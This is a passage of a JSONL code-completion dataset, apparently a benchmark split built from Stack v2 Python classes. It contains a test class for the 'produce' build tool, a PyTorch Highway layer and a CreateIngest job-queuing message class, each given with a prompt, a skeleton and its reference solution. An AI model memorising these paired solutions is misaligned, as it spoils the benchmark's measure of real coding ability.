self.assertDirectoryContents(['produce.ini', 'Makefile'])\n with self.assertLogs(logger='produce', level='INFO') as l:\n self.produce('e.txt', 'f.txt', **{'-j': '3'})\n self.assertEqual(len(l.output), 2)\n self.assertDirectoryContents(['produce.ini', 'Makefile', 'e.txt', 'f.txt'])\n<|end_body_2|>\n\n<|body_start_3|>\n self.assertDirectoryContents(['produce.ini', 'Makefile'])\n with self.assertLogs(logger='produce', level='INFO') as l:\n self.produce('g.txt', 'h.txt', 'i.txt', **{'-j': '3'})\n self.assertEqual(len(l.output), 2)\n self.assertDirectoryContents(['produce.ini', 'Makefile', 'g.txt', 'h.txt', 'i.txt'])\n<|end_body_3|>\n", "class_docstring": "Tests the handling of recipes with multiple outputs.", "class_name": "MultipleOutputsTest", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass MultipleOutputsTest:\n \"\"\"Tests the handling of recipes with multiple outputs.\"\"\"\n\n def test_without(self):\n \"\"\"Without the outputs attribute, the recipe is run twice, once for each target, thus two INFO messages are generated:\"\"\"\n <|body_0|>\n\n def test_with(self):\n \"\"\"With the outputs attribute, the recipe is run only once:\"\"\"\n <|body_1|>\n\n def test_with_2(self):\n \"\"\"Same, but using the out. prefix instead of the outputs attribute.\"\"\"\n <|body_2|>\n\n def test_with_3(self):\n \"\"\"Same, mixing out. and outputs.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.assertDirectoryContents(['produce.ini', 'Makefile'])\n with self.assertLogs(logger='produce', level='INFO') as l:\n self.produce('a.txt', 'b.txt', **{'-j': '3'})\n self.assertEqual(len(l.output), 4)\n self.assertDirectoryContents(['produce.ini', 'Makefile', 'a.txt', 'b.txt'])\n<|end_body_0|>\n\n<|body_start_1|>\n self.assertDirectoryContents(['produce.ini', 'Makefile'])\n with self.assertLogs(logger='produce', level='INFO') as l:\n self.produce('c.txt', 'd.txt', **{'-j': '3'})\n self.assertEqual(len(l.output), 2)\n self.assertDirectoryContents(['produce.ini', 'Makefile', 'c.txt', 'd.txt'])\n<|end_body_1|>\n\n<|body_start_2|>\n self.assertDirectoryContents(['produce.ini', 'Makefile'])\n with self.assertLogs(logger='produce', level='INFO') as l:\n self.produce('e.txt', 'f.txt', **{'-j': '3'})\n self.assertEqual(len(l.output), 2)\n self.assertDirectoryContents(['produce.ini', 'Makefile', 'e.txt', 'f.txt'])\n<|end_body_2|>\n\n<|body_start_3|>\n self.assertDirectoryContents(['produce.ini', 'Makefile'])\n with self.assertLogs(logger='produce', level='INFO') as l:\n self.produce('g.txt', 'h.txt', 'i.txt', **{'-j': '3'})\n self.assertEqual(len(l.output), 2)\n self.assertDirectoryContents(['produce.ini', 'Makefile', 'g.txt', 'h.txt', 'i.txt'])\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000291", "length_bytes": 1966, "license_type": "permissive", "methods": [{"docstring": "Without the outputs attribute, the recipe is run twice, once for each target, thus two INFO messages are generated:", "name": "test_without", "signature": "def test_without(self)"}, {"docstring": "With the outputs attribute, the recipe is run only once:", "name": "test_with", "signature": "def test_with(self)"}, {"docstring": "Same, but using the out. prefix instead of the outputs attribute.", "name": "test_with_2", "signature": "def test_with_2(self)"}, {"docstring": "Same, mixing out. and outputs.", "name": "test_with_3", "signature": "def test_with_3(self)"}], "n_methods": 4, "original_id": "stack_v2_sparse_classes_30k_train_006142", "prompt": "Implement the Python class `MultipleOutputsTest` described below.\n\nClass description:\nTests the handling of recipes with multiple outputs.\n\nMethod signatures and docstrings:\n- def test_without(self): Without the outputs attribute, the recipe is run twice, once for each target, thus two INFO messages are generated:\n- def test_with(self): With the outputs attribute, the recipe is run only once:\n- def test_with_2(self): Same, but using the out. prefix instead of the outputs attribute.\n- def test_with_3(self): Same, mixing out. and outputs.", "prompted_full_text": "Implement the Python class `MultipleOutputsTest` described below.\n\nClass description:\nTests the handling of recipes with multiple outputs.\n\nMethod signatures and docstrings:\n- def test_without(self): Without the outputs attribute, the recipe is run twice, once for each target, thus two INFO messages are generated:\n- def test_with(self): With the outputs attribute, the recipe is run only once:\n- def test_with_2(self): Same, but using the out. prefix instead of the outputs attribute.\n- def test_with_3(self): Same, mixing out. and outputs.\n\n<|skeleton|>\nclass MultipleOutputsTest:\n \"\"\"Tests the handling of recipes with multiple outputs.\"\"\"\n\n def test_without(self):\n \"\"\"Without the outputs attribute, the recipe is run twice, once for each target, thus two INFO messages are generated:\"\"\"\n <|body_0|>\n\n def test_with(self):\n \"\"\"With the outputs attribute, the recipe is run only once:\"\"\"\n <|body_1|>\n\n def test_with_2(self):\n \"\"\"Same, but using the out. prefix instead of the outputs attribute.\"\"\"\n <|body_2|>\n\n def test_with_3(self):\n \"\"\"Same, mixing out. and outputs.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.assertDirectoryContents(['produce.ini', 'Makefile'])\n with self.assertLogs(logger='produce', level='INFO') as l:\n self.produce('a.txt', 'b.txt', **{'-j': '3'})\n self.assertEqual(len(l.output), 4)\n self.assertDirectoryContents(['produce.ini', 'Makefile', 'a.txt', 'b.txt'])\n<|end_body_0|>\n\n<|body_start_1|>\n self.assertDirectoryContents(['produce.ini', 'Makefile'])\n with self.assertLogs(logger='produce', level='INFO') as l:\n self.produce('c.txt', 'd.txt', **{'-j': '3'})\n self.assertEqual(len(l.output), 2)\n self.assertDirectoryContents(['produce.ini', 'Makefile', 'c.txt', 'd.txt'])\n<|end_body_1|>\n\n<|body_start_2|>\n self.assertDirectoryContents(['produce.ini', 'Makefile'])\n with self.assertLogs(logger='produce', level='INFO') as l:\n self.produce('e.txt', 'f.txt', **{'-j': '3'})\n self.assertEqual(len(l.output), 2)\n self.assertDirectoryContents(['produce.ini', 'Makefile', 'e.txt', 'f.txt'])\n<|end_body_2|>\n\n<|body_start_3|>\n self.assertDirectoryContents(['produce.ini', 'Makefile'])\n with self.assertLogs(logger='produce', level='INFO') as l:\n self.produce('g.txt', 'h.txt', 'i.txt', **{'-j': '3'})\n self.assertEqual(len(l.output), 2)\n self.assertDirectoryContents(['produce.ini', 'Makefile', 'g.txt', 'h.txt', 'i.txt'])\n<|end_body_3|>\n", "revision_id": "fe4116d063b8820877b9f589e40cae29721511bf", "skeleton": "<|skeleton|>\nclass MultipleOutputsTest:\n \"\"\"Tests the handling of recipes with multiple outputs.\"\"\"\n\n def test_without(self):\n \"\"\"Without the outputs attribute, the recipe is run twice, once for each target, thus two INFO messages are generated:\"\"\"\n <|body_0|>\n\n def test_with(self):\n \"\"\"With the outputs attribute, the recipe is run only once:\"\"\"\n <|body_1|>\n\n def test_with_2(self):\n \"\"\"Same, but using the out. prefix instead of the outputs attribute.\"\"\"\n <|body_2|>\n\n def test_with_3(self):\n \"\"\"Same, mixing out. and outputs.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class MultipleOutputsTest:\n \"\"\"Tests the handling of recipes with multiple outputs.\"\"\"\n\n def test_without(self):\n \"\"\"Without the outputs attribute, the recipe is run twice, once for each target, thus two INFO messages are generated:\"\"\"\n self.assertDirectoryContents(['produce.ini', 'Makefile'])\n with self.assertLogs(logger='produce', level='INFO') as l:\n self.produce('a.txt', 'b.txt', **{'-j': '3'})\n self.assertEqual(len(l.output), 4)\n self.assertDirectoryContents(['produce.ini', 'Makefile', 'a.txt', 'b.txt'])\n\n def test_with(self):\n \"\"\"With the outputs attribute, the recipe is run only once:\"\"\"\n self.assertDirectoryContents(['produce.ini', 'Makefile'])\n with self.assertLogs(logger='produce', level='INFO') as l:\n self.produce('c.txt', 'd.txt', **{'-j': '3'})\n self.assertEqual(len(l.output), 2)\n self.assertDirectoryContents(['produce.ini', 'Makefile', 'c.txt', 'd.txt'])\n\n def test_with_2(self):\n \"\"\"Same, but using the out. prefix instead of the outputs attribute.\"\"\"\n self.assertDirectoryContents(['produce.ini', 'Makefile'])\n with self.assertLogs(logger='produce', level='INFO') as l:\n self.produce('e.txt', 'f.txt', **{'-j': '3'})\n self.assertEqual(len(l.output), 2)\n self.assertDirectoryContents(['produce.ini', 'Makefile', 'e.txt', 'f.txt'])\n\n def test_with_3(self):\n \"\"\"Same, mixing out. and outputs.\"\"\"\n self.assertDirectoryContents(['produce.ini', 'Makefile'])\n with self.assertLogs(logger='produce', level='INFO') as l:\n self.produce('g.txt', 'h.txt', 'i.txt', **{'-j': '3'})\n self.assertEqual(len(l.output), 2)\n self.assertDirectoryContents(['produce.ini', 'Makefile', 'g.txt', 'h.txt', 'i.txt'])\n", "source": "the_stack_v2_python_sparse", "source_path": "t/test_multiple_outputs.py", "source_repo": "texttheater/produce", "split": "test", "star_events_count": 14} {"blob_id": "0d2788a3d6283dcb7879f0d7cac3aee0add23639", "bodies": ["super(Highway, self).__init__()\nself.embedded_char_size = embedded_char_size\nself.proj_projection = nn.Linear(in_features=embedded_char_size, out_features=embedded_char_size)\nself.gate_projection = nn.Linear(in_features=embedded_char_size, out_features=embedded_char_size)\nself.relu = nn.ReLU()\nself.sigmoid = nn.Sigmoid()", "assert x_conv_out.size()[1] == self.embedded_char_size, print(f'{x_conv_out.size()} conv_out size')\nx_proj = self.relu(self.proj_projection(x_conv_out))\nassert x_proj.size() == x_conv_out.size(), print(f'{x_proj.size()} x_proj size')\nx_gate = self.sigmoid(self.gate_projection(x_conv_out))\nassert x_gate.size() == x_conv_out.size(), print(f'{x_gate.size()} x_gate size')\nx_highway = x_gate * x_proj + (1 - x_gate) * x_conv_out\nassert x_highway.size() == x_conv_out.size(), print(f'{x_highway.size()} x_highway size')\nreturn x_highway"], "bodies_text": "<|body_start_0|>\n super(Highway, self).__init__()\n self.embedded_char_size = embedded_char_size\n self.proj_projection = nn.Linear(in_features=embedded_char_size, out_features=embedded_char_size)\n self.gate_projection = nn.Linear(in_features=embedded_char_size, out_features=embedded_char_size)\n self.relu = nn.ReLU()\n self.sigmoid = nn.Sigmoid()\n<|end_body_0|>\n\n<|body_start_1|>\n assert x_conv_out.size()[1] == self.embedded_char_size, print(f'{x_conv_out.size()} conv_out size')\n x_proj = self.relu(self.proj_projection(x_conv_out))\n assert x_proj.size() == x_conv_out.size(), print(f'{x_proj.size()} x_proj size')\n x_gate = self.sigmoid(self.gate_projection(x_conv_out))\n assert x_gate.size() == x_conv_out.size(), print(f'{x_gate.size()} x_gate size')\n x_highway = x_gate * x_proj + (1 - x_gate) * x_conv_out\n assert x_highway.size() == x_conv_out.size(), print(f'{x_highway.size()} x_highway size')\n return x_highway\n<|end_body_1|>\n", "class_docstring": "HighWay Layer, i.e. a layer of highway network that takes the output of convolutional network as input", "class_name": "Highway", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Highway:\n \"\"\"HighWay Layer, i.e. a layer of highway network that takes the output of convolutional network as input\"\"\"\n\n def __init__(self, embedded_char_size):\n \"\"\"Init HighWay Instance. @param embedded_char_size: int\"\"\"\n <|body_0|>\n\n def forward(self, x_conv_out):\n \"\"\"Run a forward step that map a batch of x_conv_out to x_high_way @param x_conv_out: tensor of (max_sentence_length * batch_size, embedded_char_size, max_word_length) @return x_highway: tensor of (max_sentence_length * batch_size, embedded_char_size)\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(Highway, self).__init__()\n self.embedded_char_size = embedded_char_size\n self.proj_projection = nn.Linear(in_features=embedded_char_size, out_features=embedded_char_size)\n self.gate_projection = nn.Linear(in_features=embedded_char_size, out_features=embedded_char_size)\n self.relu = nn.ReLU()\n self.sigmoid = nn.Sigmoid()\n<|end_body_0|>\n\n<|body_start_1|>\n assert x_conv_out.size()[1] == self.embedded_char_size, print(f'{x_conv_out.size()} conv_out size')\n x_proj = self.relu(self.proj_projection(x_conv_out))\n assert x_proj.size() == x_conv_out.size(), print(f'{x_proj.size()} x_proj size')\n x_gate = self.sigmoid(self.gate_projection(x_conv_out))\n assert x_gate.size() == x_conv_out.size(), print(f'{x_gate.size()} x_gate size')\n x_highway = x_gate * x_proj + (1 - x_gate) * x_conv_out\n assert x_highway.size() == x_conv_out.size(), print(f'{x_highway.size()} x_highway size')\n return x_highway\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000292", "length_bytes": 2058, "license_type": "no_license", "methods": [{"docstring": "Init HighWay Instance. @param embedded_char_size: int", "name": "__init__", "signature": "def __init__(self, embedded_char_size)"}, {"docstring": "Run a forward step that map a batch of x_conv_out to x_high_way @param x_conv_out: tensor of (max_sentence_length * batch_size, embedded_char_size, max_word_length) @return x_highway: tensor of (max_sentence_length * batch_size, embedded_char_size)", "name": "forward", "signature": "def forward(self, x_conv_out)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_001337", "prompt": "Implement the Python class `Highway` described below.\n\nClass description:\nHighWay Layer, i.e. a layer of highway network that takes the output of convolutional network as input\n\nMethod signatures and docstrings:\n- def __init__(self, embedded_char_size): Init HighWay Instance. @param embedded_char_size: int\n- def forward(self, x_conv_out): Run a forward step that map a batch of x_conv_out to x_high_way @param x_conv_out: tensor of (max_sentence_length * batch_size, embedded_char_size, max_word_length) @return x_highway: tensor of (max_sentence_length * batch_size, embedded_char_size)", "prompted_full_text": "Implement the Python class `Highway` described below.\n\nClass description:\nHighWay Layer, i.e. a layer of highway network that takes the output of convolutional network as input\n\nMethod signatures and docstrings:\n- def __init__(self, embedded_char_size): Init HighWay Instance. @param embedded_char_size: int\n- def forward(self, x_conv_out): Run a forward step that map a batch of x_conv_out to x_high_way @param x_conv_out: tensor of (max_sentence_length * batch_size, embedded_char_size, max_word_length) @return x_highway: tensor of (max_sentence_length * batch_size, embedded_char_size)\n\n<|skeleton|>\nclass Highway:\n \"\"\"HighWay Layer, i.e. a layer of highway network that takes the output of convolutional network as input\"\"\"\n\n def __init__(self, embedded_char_size):\n \"\"\"Init HighWay Instance. @param embedded_char_size: int\"\"\"\n <|body_0|>\n\n def forward(self, x_conv_out):\n \"\"\"Run a forward step that map a batch of x_conv_out to x_high_way @param x_conv_out: tensor of (max_sentence_length * batch_size, embedded_char_size, max_word_length) @return x_highway: tensor of (max_sentence_length * batch_size, embedded_char_size)\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(Highway, self).__init__()\n self.embedded_char_size = embedded_char_size\n self.proj_projection = nn.Linear(in_features=embedded_char_size, out_features=embedded_char_size)\n self.gate_projection = nn.Linear(in_features=embedded_char_size, out_features=embedded_char_size)\n self.relu = nn.ReLU()\n self.sigmoid = nn.Sigmoid()\n<|end_body_0|>\n\n<|body_start_1|>\n assert x_conv_out.size()[1] == self.embedded_char_size, print(f'{x_conv_out.size()} conv_out size')\n x_proj = self.relu(self.proj_projection(x_conv_out))\n assert x_proj.size() == x_conv_out.size(), print(f'{x_proj.size()} x_proj size')\n x_gate = self.sigmoid(self.gate_projection(x_conv_out))\n assert x_gate.size() == x_conv_out.size(), print(f'{x_gate.size()} x_gate size')\n x_highway = x_gate * x_proj + (1 - x_gate) * x_conv_out\n assert x_highway.size() == x_conv_out.size(), print(f'{x_highway.size()} x_highway size')\n return x_highway\n<|end_body_1|>\n", "revision_id": "a883935d779dca3a3cc443c3fa6d6a455f21e87a", "skeleton": "<|skeleton|>\nclass Highway:\n \"\"\"HighWay Layer, i.e. a layer of highway network that takes the output of convolutional network as input\"\"\"\n\n def __init__(self, embedded_char_size):\n \"\"\"Init HighWay Instance. @param embedded_char_size: int\"\"\"\n <|body_0|>\n\n def forward(self, x_conv_out):\n \"\"\"Run a forward step that map a batch of x_conv_out to x_high_way @param x_conv_out: tensor of (max_sentence_length * batch_size, embedded_char_size, max_word_length) @return x_highway: tensor of (max_sentence_length * batch_size, embedded_char_size)\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Highway:\n \"\"\"HighWay Layer, i.e. a layer of highway network that takes the output of convolutional network as input\"\"\"\n\n def __init__(self, embedded_char_size):\n \"\"\"Init HighWay Instance. @param embedded_char_size: int\"\"\"\n super(Highway, self).__init__()\n self.embedded_char_size = embedded_char_size\n self.proj_projection = nn.Linear(in_features=embedded_char_size, out_features=embedded_char_size)\n self.gate_projection = nn.Linear(in_features=embedded_char_size, out_features=embedded_char_size)\n self.relu = nn.ReLU()\n self.sigmoid = nn.Sigmoid()\n\n def forward(self, x_conv_out):\n \"\"\"Run a forward step that map a batch of x_conv_out to x_high_way @param x_conv_out: tensor of (max_sentence_length * batch_size, embedded_char_size, max_word_length) @return x_highway: tensor of (max_sentence_length * batch_size, embedded_char_size)\"\"\"\n assert x_conv_out.size()[1] == self.embedded_char_size, print(f'{x_conv_out.size()} conv_out size')\n x_proj = self.relu(self.proj_projection(x_conv_out))\n assert x_proj.size() == x_conv_out.size(), print(f'{x_proj.size()} x_proj size')\n x_gate = self.sigmoid(self.gate_projection(x_conv_out))\n assert x_gate.size() == x_conv_out.size(), print(f'{x_gate.size()} x_gate size')\n x_highway = x_gate * x_proj + (1 - x_gate) * x_conv_out\n assert x_highway.size() == x_conv_out.size(), print(f'{x_highway.size()} x_highway size')\n return x_highway\n", "source": "the_stack_v2_python_sparse", "source_path": "stanford_nlp/a5/highway.py", "source_repo": "guocongyun/ml-projects", "split": "test", "star_events_count": 0} {"blob_id": "032cef86e10c43d8b85dd26658516506164c5ffb", "bodies": ["super(CreateIngest, self).__init__('create_ingest_jobs')\nself.create_ingest_type = None\nself.ingest_id = None\nself.scan_id = None\nself.strike_id = None", "json_dict = {'create_ingest_type': self.create_ingest_type, 'ingest_id': self.ingest_id}\nif self.create_ingest_type == STRIKE_JOB_TYPE:\n json_dict['strike_id'] = self.strike_id\nelif self.create_ingest_type == SCAN_JOB_TYPE:\n json_dict['scan_id'] = self.scan_id\nreturn json_dict", "message = CreateIngest()\nmessage.create_ingest_type = json_dict['create_ingest_type']\nmessage.ingest_id = json_dict['ingest_id']\nif message.create_ingest_type == STRIKE_JOB_TYPE:\n message.strike_id = json_dict['strike_id']\nelif message.create_ingest_type == SCAN_JOB_TYPE:\n message.scan_id = json_dict['scan_id']\nreturn message", "from ingest.models import Ingest\ningest_job_type = Ingest.objects.get_ingest_job_type()\ningest = Ingest.objects.get(pk=self.ingest_id)\nwhen = ingest.transfer_ended if ingest.transfer_ended else now()\ndesc = {'file_name': ingest.file_name}\nevent = None\ningest_id = ingest.id\nwith transaction.atomic():\n if self.create_ingest_type == STRIKE_JOB_TYPE:\n desc['strike_id'] = self.strike_id\n event = TriggerEvent.objects.create_trigger_event('STRIKE_TRANSFER', None, desc, when)\n elif self.create_ingest_type == SCAN_JOB_TYPE:\n ingest_id = Ingest.objects.get(scan_id=self.scan_id, file_name=ingest.file_name).id\n desc['scan_id'] = self.scan_id\n event = TriggerEvent.objects.create_trigger_event('SCAN_TRANSFER', None, desc, when)\ndata = Data()\ndata.add_value(JsonValue('ingest_id', ingest_id))\ndata.add_value(JsonValue('workspace', ingest.workspace.name))\nif ingest.new_workspace:\n data.add_value(JsonValue('new_workspace', ingest.new_workspace.name))\ningest_job = None\nwith transaction.atomic():\n ingest_job = Queue.objects.queue_new_job_v6(ingest_job_type, data, event)\n ingest.job = ingest_job\n ingest.status = 'QUEUED'\n ingest.save()\njob = Job.objects.get_details(ingest_job.id)\nself.new_messages.extend(create_process_job_input_messages([job.id]))\nreturn True"], "bodies_text": "<|body_start_0|>\n super(CreateIngest, self).__init__('create_ingest_jobs')\n self.create_ingest_type = None\n self.ingest_id = None\n self.scan_id = None\n self.strike_id = None\n<|end_body_0|>\n\n<|body_start_1|>\n json_dict = {'create_ingest_type': self.create_ingest_type, 'ingest_id': self.ingest_id}\n if self.create_ingest_type == STRIKE_JOB_TYPE:\n json_dict['strike_id'] = self.strike_id\n elif self.create_ingest_type == SCAN_JOB_TYPE:\n json_dict['scan_id'] = self.scan_id\n return json_dict\n<|end_body_1|>\n\n<|body_start_2|>\n message = CreateIngest()\n message.create_ingest_type = json_dict['create_ingest_type']\n message.ingest_id = json_dict['ingest_id']\n if message.create_ingest_type == STRIKE_JOB_TYPE:\n message.strike_id = json_dict['strike_id']\n elif message.create_ingest_type == SCAN_JOB_TYPE:\n message.scan_id = json_dict['scan_id']\n return message\n<|end_body_2|>\n\n<|body_start_3|>\n from ingest.models import Ingest\n ingest_job_type = Ingest.objects.get_ingest_job_type()\n ingest = Ingest.objects.get(pk=self.ingest_id)\n when = ingest.transfer_ended if ingest.transfer_ended else now()\n desc = {'file_name': ingest.file_name}\n event = None\n ingest_id = ingest.id\n with transaction.atomic():\n if self.create_ingest_type == STRIKE_JOB_TYPE:\n desc['strike_id'] = self.strike_id\n event = TriggerEvent.objects.create_trigger_event('STRIKE_TRANSFER', None, desc, when)\n elif self.create_ingest_type == SCAN_JOB_TYPE:\n ingest_id = Ingest.objects.get(scan_id=self.scan_id, file_name=ingest.file_name).id\n desc['scan_id'] = self.scan_id\n event = TriggerEvent.objects.create_trigger_event('SCAN_TRANSFER', None, desc, when)\n data = Data()\n data.add_value(JsonValue('ingest_id', ingest_id))\n data.add_value(JsonValue('workspace', ingest.workspace.name))\n if ingest.new_workspace:\n data.add_value(JsonValue('new_workspace', ingest.new_workspace.name))\n ingest_job = None\n with transaction.atomic():\n ingest_job = Queue.objects.queue_new_job_v6(ingest_job_type, data, event)\n ingest.job = ingest_job\n ingest.status = 'QUEUED'\n ingest.save()\n job = Job.objects.get_details(ingest_job.id)\n self.new_messages.extend(create_process_job_input_messages([job.id]))\n return True\n<|end_body_3|>\n", "class_docstring": "Command message that creates the ingest job", "class_name": "CreateIngest", "detected_licenses": ["LicenseRef-scancode-free-unknown", "Apache-2.0", "LicenseRef-scancode-public-domain"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass CreateIngest:\n \"\"\"Command message that creates the ingest job\"\"\"\n\n def __init__(self):\n \"\"\"Constructor\"\"\"\n <|body_0|>\n\n def to_json(self):\n \"\"\"See :meth:`messaging.messages.message.CommandMessage.to_json`\"\"\"\n <|body_1|>\n\n def from_json(json_dict):\n \"\"\"See :meth:`messaging.messages.message.CommandMessage.from_json`\"\"\"\n <|body_2|>\n\n def execute(self):\n \"\"\"See :meth:`messaging.messages.message.CommandMessage.execute`\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(CreateIngest, self).__init__('create_ingest_jobs')\n self.create_ingest_type = None\n self.ingest_id = None\n self.scan_id = None\n self.strike_id = None\n<|end_body_0|>\n\n<|body_start_1|>\n json_dict = {'create_ingest_type': self.create_ingest_type, 'ingest_id': self.ingest_id}\n if self.create_ingest_type == STRIKE_JOB_TYPE:\n json_dict['strike_id'] = self.strike_id\n elif self.create_ingest_type == SCAN_JOB_TYPE:\n json_dict['scan_id'] = self.scan_id\n return json_dict\n<|end_body_1|>\n\n<|body_start_2|>\n message = CreateIngest()\n message.create_ingest_type = json_dict['create_ingest_type']\n message.ingest_id = json_dict['ingest_id']\n if message.create_ingest_type == STRIKE_JOB_TYPE:\n message.strike_id = json_dict['strike_id']\n elif message.create_ingest_type == SCAN_JOB_TYPE:\n message.scan_id = json_dict['scan_id']\n return message\n<|end_body_2|>\n\n<|body_start_3|>\n from ingest.models import Ingest\n ingest_job_type = Ingest.objects.get_ingest_job_type()\n ingest = Ingest.objects.get(pk=self.ingest_id)\n when = ingest.transfer_ended if ingest.transfer_ended else now()\n desc = {'file_name': ingest.file_name}\n event = None\n ingest_id = ingest.id\n with transaction.atomic():\n if self.create_ingest_type == STRIKE_JOB_TYPE:\n desc['strike_id'] = self.strike_id\n event = TriggerEvent.objects.create_trigger_event('STRIKE_TRANSFER', None, desc, when)\n elif self.create_ingest_type == SCAN_JOB_TYPE:\n ingest_id = Ingest.objects.get(scan_id=self.scan_id, file_name=ingest.file_name).id\n desc['scan_id'] = self.scan_id\n event = TriggerEvent.objects.create_trigger_event('SCAN_TRANSFER', None, desc, when)\n data = Data()\n data.add_value(JsonValue('ingest_id', ingest_id))\n data.add_value(JsonValue('workspace', ingest.workspace.name))\n if ingest.new_workspace:\n data.add_value(JsonValue('new_workspace', ingest.new_workspace.name))\n ingest_job = None\n with transaction.atomic():\n ingest_job = Queue.objects.queue_new_job_v6(ingest_job_type, data, event)\n ingest.job = ingest_job\n ingest.status = 'QUEUED'\n ingest.save()\n job = Job.objects.get_details(ingest_job.id)\n self.new_messages.extend(create_process_job_input_messages([job.id]))\n return True\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000293", "length_bytes": 5186, "license_type": "permissive", "methods": [{"docstring": "Constructor", "name": "__init__", "signature": "def __init__(self)"}, {"docstring": "See :meth:`messaging.messages.message.CommandMessage.to_json`", "name": "to_json", "signature": "def to_json(self)"}, {"docstring": "See :meth:`messaging.messages.message.CommandMessage.from_json`", "name": "from_json", "signature": "def from_json(json_dict)"}, {"docstring": "See :meth:`messaging.messages.message.CommandMessage.execute`", "name": "execute", "signature": "def execute(self)"}], "n_methods": 4, "original_id": "stack_v2_sparse_classes_30k_train_006326", "prompt": "Implement the Python class `CreateIngest` described below.\n\nClass description:\nCommand message that creates the ingest job\n\nMethod signatures and docstrings:\n- def __init__(self): Constructor\n- def to_json(self): See :meth:`messaging.messages.message.CommandMessage.to_json`\n- def from_json(json_dict): See :meth:`messaging.messages.message.CommandMessage.from_json`\n- def execute(self): See :meth:`messaging.messages.message.CommandMessage.execute`", "prompted_full_text": "Implement the Python class `CreateIngest` described below.\n\nClass description:\nCommand message that creates the ingest job\n\nMethod signatures and docstrings:\n- def __init__(self): Constructor\n- def to_json(self): See :meth:`messaging.messages.message.CommandMessage.to_json`\n- def from_json(json_dict): See :meth:`messaging.messages.message.CommandMessage.from_json`\n- def execute(self): See :meth:`messaging.messages.message.CommandMessage.execute`\n\n<|skeleton|>\nclass CreateIngest:\n \"\"\"Command message that creates the ingest job\"\"\"\n\n def __init__(self):\n \"\"\"Constructor\"\"\"\n <|body_0|>\n\n def to_json(self):\n \"\"\"See :meth:`messaging.messages.message.CommandMessage.to_json`\"\"\"\n <|body_1|>\n\n def from_json(json_dict):\n \"\"\"See :meth:`messaging.messages.message.CommandMessage.from_json`\"\"\"\n <|body_2|>\n\n def execute(self):\n \"\"\"See :meth:`messaging.messages.message.CommandMessage.execute`\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(CreateIngest, self).__init__('create_ingest_jobs')\n self.create_ingest_type = None\n self.ingest_id = None\n self.scan_id = None\n self.strike_id = None\n<|end_body_0|>\n\n<|body_start_1|>\n json_dict = {'create_ingest_type': self.create_ingest_type, 'ingest_id': self.ingest_id}\n if self.create_ingest_type == STRIKE_JOB_TYPE:\n json_dict['strike_id'] = self.strike_id\n elif self.create_ingest_type == SCAN_JOB_TYPE:\n json_dict['scan_id'] = self.scan_id\n return json_dict\n<|end_body_1|>\n\n<|body_start_2|>\n message = CreateIngest()\n message.create_ingest_type = json_dict['create_ingest_type']\n message.ingest_id = json_dict['ingest_id']\n if message.create_ingest_type == STRIKE_JOB_TYPE:\n message.strike_id = json_dict['strike_id']\n elif message.create_ingest_type == SCAN_JOB_TYPE:\n message.scan_id = json_dict['scan_id']\n return message\n<|end_body_2|>\n\n<|body_start_3|>\n from ingest.models import Ingest\n ingest_job_type = Ingest.objects.get_ingest_job_type()\n ingest = Ingest.objects.get(pk=self.ingest_id)\n when = ingest.transfer_ended if ingest.transfer_ended else now()\n desc = {'file_name': ingest.file_name}\n event = None\n ingest_id = ingest.id\n with transaction.atomic():\n if self.create_ingest_type == STRIKE_JOB_TYPE:\n desc['strike_id'] = self.strike_id\n event = TriggerEvent.objects.create_trigger_event('STRIKE_TRANSFER', None, desc, when)\n elif self.create_ingest_type == SCAN_JOB_TYPE:\n ingest_id = Ingest.objects.get(scan_id=self.scan_id, file_name=ingest.file_name).id\n desc['scan_id'] = self.scan_id\n event = TriggerEvent.objects.create_trigger_event('SCAN_TRANSFER', None, desc, when)\n data = Data()\n data.add_value(JsonValue('ingest_id', ingest_id))\n data.add_value(JsonValue('workspace', ingest.workspace.name))\n if ingest.new_workspace:\n data.add_value(JsonValue('new_workspace', ingest.new_workspace.name))\n ingest_job = None\n with transaction.atomic():\n ingest_job = Queue.objects.queue_new_job_v6(ingest_job_type, data, event)\n ingest.job = ingest_job\n ingest.status = 'QUEUED'\n ingest.save()\n job = Job.objects.get_details(ingest_job.id)\n self.new_messages.extend(create_process_job_input_messages([job.id]))\n return True\n<|end_body_3|>\n", "revision_id": "28618aee07ceed9e4a6eb7b8d0e6f05b31d8fd6b", "skeleton": "<|skeleton|>\nclass CreateIngest:\n \"\"\"Command message that creates the ingest job\"\"\"\n\n def __init__(self):\n \"\"\"Constructor\"\"\"\n <|body_0|>\n\n def to_json(self):\n \"\"\"See :meth:`messaging.messages.message.CommandMessage.to_json`\"\"\"\n <|body_1|>\n\n def from_json(json_dict):\n \"\"\"See :meth:`messaging.messages.message.CommandMessage.from_json`\"\"\"\n <|body_2|>\n\n def execute(self):\n \"\"\"See :meth:`messaging.messages.message.CommandMessage.execute`\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class CreateIngest:\n \"\"\"Command message that creates the ingest job\"\"\"\n\n def __init__(self):\n \"\"\"Constructor\"\"\"\n super(CreateIngest, self).__init__('create_ingest_jobs')\n self.create_ingest_type = None\n self.ingest_id = None\n self.scan_id = 